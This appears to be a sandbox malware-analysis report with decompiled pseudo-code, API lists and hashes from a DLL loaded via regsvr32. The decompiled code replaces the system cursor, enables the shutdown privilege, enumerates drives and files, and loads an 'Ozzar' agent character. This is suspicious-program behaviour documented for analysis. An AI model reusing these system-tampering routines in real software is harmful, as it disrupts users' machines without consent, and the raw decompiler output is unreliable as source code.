                                                                                                                						_t419 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x92);
                                                                                                                						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t419);
                                                                                                                						E10023187(_t608, _t855, _t865, __eflags);
                                                                                                                						_t425 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x93);
                                                                                                                						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t425);
                                                                                                                						E10023187(_t608, _t855, _t865, __eflags);
                                                                                                                						_t432 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x95);
                                                                                                                						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t432);
                                                                                                                						E10023187(_t608, _t855, _t865, __eflags);
                                                                                                                						_t438 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x90);
                                                                                                                						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t438);
                                                                                                                						E10023187(_t608, _t855, _t865, __eflags);
                                                                                                                						_t444 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x96);
                                                                                                                						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t444);
                                                                                                                						__eflags = _t855 - _t608;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							_t856 =  *(_t855 + 4);
                                                                                                                						} else {
                                                                                                                							_t856 = 0;
                                                                                                                						}
                                                                                                                						_push(SendMessageA( *(_t865 + 0x2d0), 0x1003, _t608, _t856));
                                                                                                                						E1002688E(_t608,  *(_t865 + 0x2d0), _t856, _t865, __eflags);
                                                                                                                						_t857 = _t865 + 0x2b0;
                                                                                                                						E10026562(_t865 + 0x2b0, 3, _t608, 0x100586d0, _t608, _t608, _t608, _t608);
                                                                                                                						E10026562(_t865 + 0x2b0, 3, 1, 0x100586b0, _t608, _t608, 1, _t608);
                                                                                                                						E10026562(_t865 + 0x2b0, 3, 2, 0x100586a4, _t608, _t608, 2, _t608);
                                                                                                                						E10026562(_t865 + 0x2b0, 3, 3, 0x10058698, _t608, _t608, 3, _t608);
                                                                                                                						E10026562(_t865 + 0x2b0, 3, 4, 0x1005868c, _t608, _t608, 4, _t608);
                                                                                                                						E10026562(_t857, 3, 5, 0x10058684, _t608, _t608, 5, _t608);
                                                                                                                						E10026562(_t857, 3, 6, 0x10058678, _t608, _t608, 6, _t608);
                                                                                                                						 *(_t865 + 0x290) = _t608;
                                                                                                                						 *(_t865 + 0x294) = _t608;
                                                                                                                						 *(_t865 + 0x28c) = _t608;
                                                                                                                						 *(_t865 + 0x278) = _t608;
                                                                                                                						E10023187(_t608, _t857, _t865, __eflags);
                                                                                                                						 *((intOrPtr*)(_t865 + 0x260)) = CopyIcon(LoadCursorA(_t608, 0x7f00));
                                                                                                                						_t460 = LoadCursorFromFileA("mouse.ani");
                                                                                                                						__eflags = _t460 - _t608;
                                                                                                                						 *(_t865 + 0x25c) = _t460;
                                                                                                                						_push(_t608);
                                                                                                                						if(__eflags != 0) {
                                                                                                                							_t857 = ShowCursor;
                                                                                                                							ShowCursor(??);
                                                                                                                							SetSystemCursor( *(_t865 + 0x25c), 0x7f00);
                                                                                                                							ShowCursor(1);
                                                                                                                						} else {
                                                                                                                							_push(_t608);
                                                                                                                							_push(0x10058658);
                                                                                                                							E1002181C(_t608, _t857, _t865, __eflags);
                                                                                                                						}
                                                                                                                						OpenProcessToken(GetCurrentProcess(), 0x28, 0x1006f114);
                                                                                                                						LookupPrivilegeValueA(_t608, "SeShutdownPrivilege", 0x1006f10c);
                                                                                                                						_t819 =  *0x1006f114; // 0x0
                                                                                                                						_t467 = 0x1006f10c->LowPart; // 0x0
                                                                                                                						_t716 =  *0x1006f110; // 0x0
                                                                                                                						0x1006f0fc->PrivilegeCount = 1;
                                                                                                                						 *0x1006f100 = _t467;
                                                                                                                						 *0x1006f104 = _t716;
                                                                                                                						 *0x1006f108 = 2;
                                                                                                                						AdjustTokenPrivileges(_t819, _t608, 0x1006f0fc, 0x10, _t608, _t608);
                                                                                                                						_t469 = E10023187(_t608, _t857, _t865, __eflags);
                                                                                                                						_t858 = _t865 + 0x6c4;
                                                                                                                						E10022989(_t865 + 0x6c4, _t865 + 0x6c4, _t870, LoadMenuA( *(_t469 + 0xc), 0xa7));
                                                                                                                						E10004790(_t865 + 0x6c4, _t865 + 0x6c4, _t608);
                                                                                                                						 *((intOrPtr*)(_t865 + 0x74)) = 0x1e8;
                                                                                                                						E10023187(_t608, _t865 + 0x6c4, _t865, __eflags);
                                                                                                                						 *((intOrPtr*)(_t865 + 0x88)) = LoadIconA( *(E10023187(_t608, _t858, _t865, __eflags) + 0xc), 0x88);
                                                                                                                						 *(_t865 + 0x78) =  *(_t865 + 0x20);
                                                                                                                						_t479 = 0x1005861c;
                                                                                                                						_t218 = _t479 + 1; // 0x1005861d
                                                                                                                						_t859 = _t218;
                                                                                                                						do {
                                                                                                                							_t719 =  *_t479;
                                                                                                                							_t479 = _t479 + 1;
                                                                                                                							__eflags = _t719;
                                                                                                                						} while (_t719 != 0);
                                                                                                                						E1003C380(_t865 + 0x8c, 0x1005861c, _t479 - _t859 + 1);
                                                                                                                						_t879 = _t878 + 0xc;
                                                                                                                						 *((intOrPtr*)(_t865 + 0x84)) = 0x7d05;
                                                                                                                						 *((intOrPtr*)(_t865 + 0x80)) = 7;
                                                                                                                						_v148 = _t608;
                                                                                                                						E1002A52A(_t608,  &_v148, _t859, _t865, __eflags);
                                                                                                                						_v52 = 8;
                                                                                                                						_t484 = E10001530( &_v216);
                                                                                                                						_v56 = 9;
                                                                                                                						E10016110(_t865 + 0x298, _t484);
                                                                                                                						 *((char*)(_t879 + 0xc0)) = 8;
                                                                                                                						E1001614A( &_v224);
                                                                                                                						_v196 = _t608;
                                                                                                                						E1002A52A(_t608,  &_v196, _t859, _t865, __eflags);
                                                                                                                						_v64 = 0xa;
                                                                                                                						_t489 = E100013D0( &_v228, "Ozzar",  &_v200);
                                                                                                                						_v76 = 0xb;
                                                                                                                						E10016110(_t865 + 0x2a8, _t489);
                                                                                                                						_v80 = 0xa;
                                                                                                                						E1001614A( &_v244);
                                                                                                                						_t860 = __imp__#9;
                                                                                                                						_v80 = 8;
                                                                                                                						 *_t860( &_v216, "Ozzar.acs", "0");
                                                                                                                						_t494 = E10001380( &_v248, "Ozzar");
                                                                                                                						_v92 = 0xc;
                                                                                                                						E10016110(_t865 + 0x2a0, _t494);
                                                                                                                						_v96 = 8;
                                                                                                                						E1001614A( &_v260);
                                                                                                                						E100012C0( &_v260,  &_v196);
                                                                                                                						E1001614A( &_v268);
                                                                                                                						E1002A12B( &_v132);
                                                                                                                						_v108 = 0xd;
                                                                                                                						_t501 = GetSystemMetrics(_t608);
                                                                                                                						asm("cdq");
                                                                                                                						E10001160(_t865 + 0x2a0, _t501 -  &_v260 >> 1);
                                                                                                                						_t505 = GetSystemMetrics(1);
                                                                                                                						asm("cdq");
                                                                                                                						E10001180(_t865 + 0x2a0, _t505 -  &_v260 >> 1);
                                                                                                                						_t509 = GetSystemMetrics(1);
                                                                                                                						E10001220( &_v280, GetSystemMetrics(_t608) - 0x96, _t509 - 0xc8, _t879 + 0xa4);
                                                                                                                						E1001614A( &_v296);
                                                                                                                						 *(_t879 + 0x88) = _t608;
                                                                                                                						E1002A52A(_t608, _t879 + 0x88, _t860, _t865 + 0x2a0, __eflags);
                                                                                                                						_v136 = 0xe;
                                                                                                                						E1002A12B(_t879 + 0x94);
                                                                                                                						_v140 = 0xf;
                                                                                                                						E10001310(_t879 + 0x20, "Announce");
                                                                                                                						E1001614A(_t879 + 0x1c);
                                                                                                                						E100011D0(_t879 + 0x24, _t879 + 0x88, _t879 + 0x94);
                                                                                                                						E1001614A( &_v324);
                                                                                                                						E10001310( &_v324, "Wave");
                                                                                                                						E1001614A( &_v332);
                                                                                                                						E10001310( &_v332, "RestPose");
                                                                                                                						E1001614A( &_v340);
                                                                                                                						 *_t860( &_v220, 0x100585dc);
                                                                                                                						 *_t860( &_v240);
                                                                                                                						 *_t860( &_v212);
                                                                                                                						 *_t860( &_v288);
                                                                                                                						_t754 =  &_v276;
                                                                                                                						 *((char*)(_t879 + 0xc0)) = 0;
                                                                                                                						E1002A960(_t608, _t754,  &_v240, _t860, _t865 + 0x2a0, __eflags);
                                                                                                                						_t535 = _v360 + 0xfffffff0;
                                                                                                                						 *((intOrPtr*)(_t879 + 0xc0)) = 0xffffffff;
                                                                                                                						asm("lock xadd [edx], ecx");
                                                                                                                						__eflags = (_t754 | 0xffffffff) - 1;
                                                                                                                						if((_t754 | 0xffffffff) - 1 <= 0) {
                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t535)) + 4))))(_t535);
                                                                                                                						}
                                                                                                                						 *[fs:0x0] =  *((intOrPtr*)(_t879 + 0xb8));
                                                                                                                						return 1;
                                                                                                                					} else {
                                                                                                                						_t608 = _t865 + 0x7ec;
                                                                                                                						while(1) {
                                                                                                                							SHGetFileInfoA(_t852, 0, _t608, 0x160, 0x100);
                                                                                                                							 *((intOrPtr*)(_t865 + 0x7e8)) = E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t852, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x7e4)), 0xffffffff, _t608->hIcon);
                                                                                                                							_t846 = E100263F9(_t865 + 0x550, 0x23, _t852, _t551, _t551, 0, 0, 0, _v176, 0xffff0002);
                                                                                                                							SendMessageA( *(_t865 + 0x570), 0x1114, 0, _t846);
                                                                                                                							E1002A93C( &_v240, __eflags);
                                                                                                                							_push(_t846);
                                                                                                                							_push( &_v252);
                                                                                                                							 *((char*)(_t878 + 0xc8)) = 1;
                                                                                                                							E10026A46(_t608, _t865 + 0x550, _v176, _t846, _t865, __eflags);
                                                                                                                							_t830 =  &_v260;
                                                                                                                							_v112 = 2;
                                                                                                                							_t558 = E10002170( &_v224, _t830, "\\*.*");
                                                                                                                							_t878 = _t878 + 0xc;
                                                                                                                							_push(0);
                                                                                                                							_push( *_t558);
                                                                                                                							_v112 = 3;
                                                                                                                							_v272 = E1002A9C8( &_v248, _t830, __eflags);
                                                                                                                							_t562 =  &(_v232[0xfffffffffffffff0]);
                                                                                                                							 *((char*)(_t878 + 0xc0)) = 2;
                                                                                                                							asm("lock xadd [ecx], edx");
                                                                                                                							_t807 = (_t830 | 0xffffffff) - 1;
                                                                                                                							__eflags = (_t830 | 0xffffffff) - 1;
                                                                                                                							if((_t830 | 0xffffffff) - 1 <= 0) {
                                                                                                                								_t807 =  *( *_t562);
                                                                                                                								 *((intOrPtr*)( *((intOrPtr*)( *( *_t562) + 4))))(_t562);
                                                                                                                							}
                                                                                                                							__eflags = _v224;
                                                                                                                							if(_v224 == 0) {
                                                                                                                								goto L28;
                                                                                                                							}
                                                                                                                							while(1) {
                                                                                                                								_v224 = E1002A655(_t878 + 0x38);
                                                                                                                								_t571 = E100173A6();
                                                                                                                								__eflags = _t571;
                                                                                                                								_t637 = 0 | __eflags != 0x00000000;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								_t835 =  *_t571;
                                                                                                                								_v216 =  *((intOrPtr*)( *((intOrPtr*)(_t835 + 0xc))))() + 0x10;
                                                                                                                								_v72 = 4;
                                                                                                                								_t575 = E1002A903(_t878 + 0x38);
                                                                                                                								__eflags = _t575;
                                                                                                                								if(_t575 == 0) {
                                                                                                                									_t835 =  *(_t878 + 0x38);
                                                                                                                									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t835 + 0x38))))(0x10);
                                                                                                                									if(__eflags != 0) {
                                                                                                                										_push(_t878 + 0x58);
                                                                                                                										_t788 =  &_v212;
                                                                                                                										SHGetFileInfoA( *(E1002AB67(_t608, _t788, _t835, _t846, _t865, __eflags)), 0, _t608, 0x160, 0x100);
                                                                                                                										_t586 = _v204 + 0xfffffff0;
                                                                                                                										asm("lock xadd [edx], ecx");
                                                                                                                										__eflags = (_t788 | 0xffffffff) - 1;
                                                                                                                										if(__eflags <= 0) {
                                                                                                                											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t586)) + 4))))(_t586);
                                                                                                                										}
                                                                                                                										_t589 = E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t846, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x7e4)), 0xffffffff, _t608->hIcon);
                                                                                                                										_t838 =  &_v276;
                                                                                                                										_push(_t838);
                                                                                                                										 *((intOrPtr*)(_t865 + 0x7e8)) = _t589;
                                                                                                                										_t590 = E1002ABF7(_t608,  &_v248, _t838, _t846, _t865, __eflags);
                                                                                                                										_v116 = 5;
                                                                                                                										E100263F9(_t865 + 0x550, 0x23,  *_t590,  *((intOrPtr*)(_t865 + 0x7e8)),  *((intOrPtr*)(_t865 + 0x7e8)), 0, 0, 0, _t846, 0xffff0002);
                                                                                                                										_t594 = _v316 + 0xfffffff0;
                                                                                                                										_v152 = 4;
                                                                                                                										asm("lock xadd [ecx], edx");
                                                                                                                										_t835 = (_t838 | 0xffffffff) - 1;
                                                                                                                										__eflags = _t835;
                                                                                                                										if(_t835 <= 0) {
                                                                                                                											_t835 =  *( *_t594);
                                                                                                                											 *((intOrPtr*)( *((intOrPtr*)(_t835 + 4))))(_t594);
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                								_t577 = _v216 + 0xfffffff0;
                                                                                                                								_v72 = 2;
                                                                                                                								asm("lock xadd [ecx], edx");
                                                                                                                								_t807 = (_t835 | 0xffffffff) - 1;
                                                                                                                								__eflags = (_t835 | 0xffffffff) - 1;
                                                                                                                								if((_t835 | 0xffffffff) - 1 <= 0) {
                                                                                                                									_t807 =  *( *_t577);
                                                                                                                									 *((intOrPtr*)( *((intOrPtr*)( *( *_t577) + 4))))(_t577);
                                                                                                                								}
                                                                                                                								__eflags = _v224;
                                                                                                                								if(_v224 != 0) {
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									goto L28;
                                                                                                                								}
                                                                                                                								goto L53;
                                                                                                                							}
                                                                                                                							goto L1;
                                                                                                                							L28:
                                                                                                                							_t563 =  &(_v228[_v212 + 1]);
                                                                                                                							_v228 = _t563;
                                                                                                                							_t833 =  &(_t563[1]);
                                                                                                                							do {
                                                                                                                								_t776 =  *_t563;
                                                                                                                								_t563 =  &(_t563[1]);
                                                                                                                								__eflags = _t776;
                                                                                                                							} while (_t776 != 0);
                                                                                                                							_t862 = _t563 - _t833;
                                                                                                                							_t566 = _v220 + 0xfffffff0;
                                                                                                                							_v212 = _t862;
                                                                                                                							_v72 = 1;
                                                                                                                							asm("lock xadd [ecx], edx");
                                                                                                                							_t815 = (_t833 | 0xffffffff) - 1;
                                                                                                                							__eflags = (_t833 | 0xffffffff) - 1;
                                                                                                                							if(__eflags <= 0) {
                                                                                                                								_t815 =  *( *_t566);
                                                                                                                								 *((intOrPtr*)( *((intOrPtr*)( *( *_t566) + 4))))(_t566);
                                                                                                                							}
                                                                                                                							_v72 = 0;
                                                                                                                							E1002A960(_t608, _t878 + 0x38, _t815, _t862, _t865, __eflags);
                                                                                                                							__eflags = _t862;
                                                                                                                							if(__eflags > 0) {
                                                                                                                								_t852 = _v228;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								_t608 = 0;
                                                                                                                								__eflags = 0;
                                                                                                                								goto L34;
                                                                                                                							}
                                                                                                                							goto L53;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t602 = _v204 + 0xfffffff0;
                                                                                                                					 *((intOrPtr*)(_t878 + 0xc0)) = 0xffffffff;
                                                                                                                					asm("lock xadd [ecx], edx");
                                                                                                                					if((_t814 | 0xffffffff) - 1 <= 0) {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t602)) + 4))))(_t602);
                                                                                                                					}
                                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t878 + 0xb8));
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				L53:
                                                                                                                			}
                                                                                                                0x1000d4a5
                                                                                                                0x1000d4b5
                                                                                                                0x1000d4c3
                                                                                                                0x1000d4d3
                                                                                                                0x1000d4e1
                                                                                                                0x1000d4f1
                                                                                                                0x1000d4ff
                                                                                                                0x1000d50f
                                                                                                                0x1000d51d
                                                                                                                0x1000d52d
                                                                                                                0x1000d53b
                                                                                                                0x1000d54b
                                                                                                                0x1000d559
                                                                                                                0x1000d569
                                                                                                                0x1000d577
                                                                                                                0x1000d582
                                                                                                                0x1000d58c
                                                                                                                0x1000d591
                                                                                                                0x1000d593
                                                                                                                0x1000d599
                                                                                                                0x1000d595
                                                                                                                0x1000d595
                                                                                                                0x1000d595
                                                                                                                0x1000d5b0
                                                                                                                0x1000d5b1
                                                                                                                0x1000d5c2
                                                                                                                0x1000d5e6
                                                                                                                0x1000d5f0
                                                                                                                0x1000d5f2
                                                                                                                0x1000d5f2
                                                                                                                0x1000d5f6
                                                                                                                0x1000d5fb
                                                                                                                0x1000d600
                                                                                                                0x1000d60f
                                                                                                                0x1000d655
                                                                                                                0x1000d659
                                                                                                                0x1000d65b
                                                                                                                0x1000d65f
                                                                                                                0x1000d662
                                                                                                                0x1000d662
                                                                                                                0x1000d664
                                                                                                                0x1000d667
                                                                                                                0x1000d667
                                                                                                                0x1000d66b
                                                                                                                0x1000d66b
                                                                                                                0x1000d66d
                                                                                                                0x1000d671
                                                                                                                0x1000d944
                                                                                                                0x1000d950
                                                                                                                0x1000d95c
                                                                                                                0x1000d968
                                                                                                                0x1000d974
                                                                                                                0x1000d980
                                                                                                                0x1000d98e
                                                                                                                0x1000d99a
                                                                                                                0x1000d9a3
                                                                                                                0x1000d9b0
                                                                                                                0x1000d9b6
                                                                                                                0x1000d9bf
                                                                                                                0x1000d9c4
                                                                                                                0x1000d9c5
                                                                                                                0x1000d9ce
                                                                                                                0x1000d9d6
                                                                                                                0x1000d9dd
                                                                                                                0x1000d9e6
                                                                                                                0x1000d9ea
                                                                                                                0x1000d9ef
                                                                                                                0x1000d9f3
                                                                                                                0x1000da04
                                                                                                                0x1000da09
                                                                                                                0x1000da0d
                                                                                                                0x1000da16
                                                                                                                0x1000da18
                                                                                                                0x1000da1c
                                                                                                                0x1000da21
                                                                                                                0x1000da24
                                                                                                                0x1000da28
                                                                                                                0x1000da2a
                                                                                                                0x1000da32
                                                                                                                0x1000da41
                                                                                                                0x1000da34
                                                                                                                0x1000da34
                                                                                                                0x1000da3b
                                                                                                                0x1000da3b
                                                                                                                0x1000da45
                                                                                                                0x1000da48
                                                                                                                0x1000da4c
                                                                                                                0x1000da4d
                                                                                                                0x1000da51
                                                                                                                0x1000da59
                                                                                                                0x1000da62
                                                                                                                0x1000da67
                                                                                                                0x1000da72
                                                                                                                0x1000da72
                                                                                                                0x1000da77
                                                                                                                0x1000da77
                                                                                                                0x1000da88
                                                                                                                0x1000da92
                                                                                                                0x1000da97
                                                                                                                0x1000daaa
                                                                                                                0x1000dac0
                                                                                                                0x1000dac5
                                                                                                                0x1000dad8
                                                                                                                0x1000daee
                                                                                                                0x1000daf3
                                                                                                                0x1000db06
                                                                                                                0x1000db1c
                                                                                                                0x1000db21
                                                                                                                0x1000db34
                                                                                                                0x1000db4a
                                                                                                                0x1000db4f
                                                                                                                0x1000db62
                                                                                                                0x1000db78
                                                                                                                0x1000db7d
                                                                                                                0x1000db90
                                                                                                                0x1000dba6
                                                                                                                0x1000dbab
                                                                                                                0x1000dbbe
                                                                                                                0x1000dbd4
                                                                                                                0x1000dbd9
                                                                                                                0x1000dbdb
                                                                                                                0x1000dbe1
                                                                                                                0x1000dbdd
                                                                                                                0x1000dbdd
                                                                                                                0x1000dbdd
                                                                                                                0x1000dbf8
                                                                                                                0x1000dbf9
                                                                                                                0x1000dc08
                                                                                                                0x1000dc12
                                                                                                                0x1000dc27
                                                                                                                0x1000dc3c
                                                                                                                0x1000dc51
                                                                                                                0x1000dc66
                                                                                                                0x1000dc7b
                                                                                                                0x1000dc90
                                                                                                                0x1000dc95
                                                                                                                0x1000dc9b
                                                                                                                0x1000dca1
                                                                                                                0x1000dca7
                                                                                                                0x1000dcad
                                                                                                                0x1000dcca
                                                                                                                0x1000dcd0
                                                                                                                0x1000dcd6
                                                                                                                0x1000dcd8
                                                                                                                0x1000dcde
                                                                                                                0x1000dcdf
                                                                                                                0x1000dcee
                                                                                                                0x1000dcf4
                                                                                                                0x1000dd02
                                                                                                                0x1000dd0a
                                                                                                                0x1000dce1
                                                                                                                0x1000dce1
                                                                                                                0x1000dce2
                                                                                                                0x1000dce7
                                                                                                                0x1000dce7
                                                                                                                0x1000dd1a
                                                                                                                0x1000dd2b
                                                                                                                0x1000dd31
                                                                                                                0x1000dd37
                                                                                                                0x1000dd3c
                                                                                                                0x1000dd4d
                                                                                                                0x1000dd57
                                                                                                                0x1000dd5c
                                                                                                                0x1000dd62
                                                                                                                0x1000dd6c
                                                                                                                0x1000dd72
                                                                                                                0x1000dd80
                                                                                                                0x1000dd8f
                                                                                                                0x1000dd98
                                                                                                                0x1000dd9d
                                                                                                                0x1000dda4
                                                                                                                0x1000ddb9
                                                                                                                0x1000ddc2
                                                                                                                0x1000ddc5
                                                                                                                0x1000ddca
                                                                                                                0x1000ddca
                                                                                                                0x1000ddd0
                                                                                                                0x1000ddd0
                                                                                                                0x1000ddd2
                                                                                                                0x1000ddd5
                                                                                                                0x1000ddd5
                                                                                                                0x1000ddeb
                                                                                                                0x1000ddf0
                                                                                                                0x1000ddfc
                                                                                                                0x1000de06
                                                                                                                0x1000de10
                                                                                                                0x1000de15
                                                                                                                0x1000de25
                                                                                                                0x1000de2d
                                                                                                                0x1000de3b
                                                                                                                0x1000de43
                                                                                                                0x1000de4c
                                                                                                                0x1000de54
                                                                                                                0x1000de62
                                                                                                                0x1000de67
                                                                                                                0x1000de7d
                                                                                                                0x1000de85
                                                                                                                0x1000de91
                                                                                                                0x1000de99
                                                                                                                0x1000dea2
                                                                                                                0x1000deaa
                                                                                                                0x1000deaf
                                                                                                                0x1000deba
                                                                                                                0x1000dec2
                                                                                                                0x1000ded0
                                                                                                                0x1000dede
                                                                                                                0x1000dee6
                                                                                                                0x1000deef
                                                                                                                0x1000def7
                                                                                                                0x1000df08
                                                                                                                0x1000df11
                                                                                                                0x1000df1e
                                                                                                                0x1000df2a
                                                                                                                0x1000df32
                                                                                                                0x1000df34
                                                                                                                0x1000df3c
                                                                                                                0x1000df43
                                                                                                                0x1000df45
                                                                                                                0x1000df4d
                                                                                                                0x1000df5c
                                                                                                                0x1000df74
                                                                                                                0x1000df7d
                                                                                                                0x1000df8e
                                                                                                                0x1000df96
                                                                                                                0x1000dfa3
                                                                                                                0x1000dfab
                                                                                                                0x1000dfbc

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 1000D1A2
                                                                                                                • SendMessageA.USER32 ref: 1000D1B6
                                                                                                                • LoadIconA.USER32 ref: 1000D1EE
                                                                                                                • LoadIconA.USER32 ref: 1000D21C
                                                                                                                • LoadIconA.USER32 ref: 1000D24A
                                                                                                                • LoadIconA.USER32 ref: 1000D278
                                                                                                                • LoadIconA.USER32 ref: 1000D2A6
                                                                                                                • LoadIconA.USER32 ref: 1000D2D4
                                                                                                                • LoadIconA.USER32 ref: 1000D302
                                                                                                                  • Part of subcall function 10011BB0: SendMessageA.USER32 ref: 10011BCA
                                                                                                                  • Part of subcall function 10001DB0: _memmove_s.LIBCMT ref: 10001E0D
                                                                                                                  • Part of subcall function 10001DB0: _memcpy_s.LIBCMT ref: 10001E17
                                                                                                                • SendMessageA.USER32 ref: 1000D5AA
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000D5EA
                                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 1000D604
                                                                                                                • SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000100), ref: 1000D692
                                                                                                                • SendMessageA.USER32 ref: 1000D6EA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad$MessageSend$DriveLogicalStrings$FileInfo_memcpy_s_memmove_s
                                                                                                                • String ID: Announce$Ozzar$Ozzar.acs$RestPose$SeShutdownPrivilege$Wave$\*.*$data\*.*$mouse.ani
                                                                                                                • API String ID: 966112117-3269483239
                                                                                                                • Opcode ID: dccc14599d2c152c7233265e66226a70e11e2afe466b1512555df5cec033be7e
                                                                                                                • Instruction ID: f738ea85102179e069dd6e1d2d16925cff321856bed6e48fba8c51e9f2b41b3d
                                                                                                                • Opcode Fuzzy Hash: dccc14599d2c152c7233265e66226a70e11e2afe466b1512555df5cec033be7e
                                                                                                                • Instruction Fuzzy Hash: 78928F79204340AFE314DB64CC92FAAB3A9EF88354F444A1CF55A5B2D2DF70B944CB66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 40%
                                                                                                                			E10010ED0(void* __ebx, void* __edx, void* __edi, void* __ebp, intOrPtr _a4) {
                                                                                                                				int _v4;
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				char _v1012;
                                                                                                                				char _v1016;
                                                                                                                				char _v1020;
                                                                                                                				char _v1024;
                                                                                                                				signed int _v1028;
                                                                                                                				intOrPtr _v1030;
                                                                                                                				signed char _v1051;
                                                                                                                				intOrPtr _v1052;
                                                                                                                				signed short _v1054;
                                                                                                                				intOrPtr _v1064;
                                                                                                                				char _v1076;
                                                                                                                				int _v1084;
                                                                                                                				signed char _v1087;
                                                                                                                				signed int _v1088;
                                                                                                                				char _v1092;
                                                                                                                				int _v1100;
                                                                                                                				struct HWND__** _v1116;
                                                                                                                				signed int _v1120;
                                                                                                                				struct HWND__** _v1124;
                                                                                                                				char _v1128;
                                                                                                                				char _v1136;
                                                                                                                				signed int _v1148;
                                                                                                                				signed int _v1220;
                                                                                                                				signed int _v1260;
                                                                                                                				char _v1288;
                                                                                                                				short _v1336;
                                                                                                                				struct HWND__* _v1338;
                                                                                                                				char _v1340;
                                                                                                                				char _v1372;
                                                                                                                				char _v1392;
                                                                                                                				char _v1404;
                                                                                                                				int _v1412;
                                                                                                                				char _v1468;
                                                                                                                				char _v1476;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t116;
                                                                                                                				signed int _t118;
                                                                                                                				intOrPtr* _t121;
                                                                                                                				intOrPtr* _t126;
                                                                                                                				void* _t132;
                                                                                                                				long _t135;
                                                                                                                				void* _t137;
                                                                                                                				void* _t142;
                                                                                                                				intOrPtr* _t147;
                                                                                                                				signed short _t151;
                                                                                                                				void* _t155;
                                                                                                                				intOrPtr* _t161;
                                                                                                                				intOrPtr* _t163;
                                                                                                                				signed int _t169;
                                                                                                                				struct HWND__* _t171;
                                                                                                                				void* _t174;
                                                                                                                				intOrPtr* _t175;
                                                                                                                				struct HWND__* _t176;
                                                                                                                				struct HWND__* _t178;
                                                                                                                				void* _t184;
                                                                                                                				void* _t186;
                                                                                                                				void* _t196;
                                                                                                                				signed int _t214;
                                                                                                                				void* _t215;
                                                                                                                				intOrPtr* _t216;
                                                                                                                				signed short _t217;
                                                                                                                				void* _t238;
                                                                                                                				struct HWND__** _t243;
                                                                                                                				intOrPtr _t254;
                                                                                                                				intOrPtr _t255;
                                                                                                                				struct tagMSG* _t278;
                                                                                                                				char _t284;
                                                                                                                				int _t301;
                                                                                                                				void* _t302;
                                                                                                                				struct HWND__** _t303;
                                                                                                                				intOrPtr _t306;
                                                                                                                				void* _t307;
                                                                                                                				struct HWND__** _t308;
                                                                                                                				void* _t309;
                                                                                                                				void* _t310;
                                                                                                                				void* _t311;
                                                                                                                				void* _t315;
                                                                                                                				signed int _t316;
                                                                                                                				void* _t318;
                                                                                                                				signed int _t319;
                                                                                                                				intOrPtr* _t323;
                                                                                                                
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E1005209B);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t316 = _t315 - 0x434;
                                                                                                                				_t116 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v16 = _t116 ^ _t316;
                                                                                                                				_push(__ebx);
                                                                                                                				_push(__ebp);
                                                                                                                				_push(__edi);
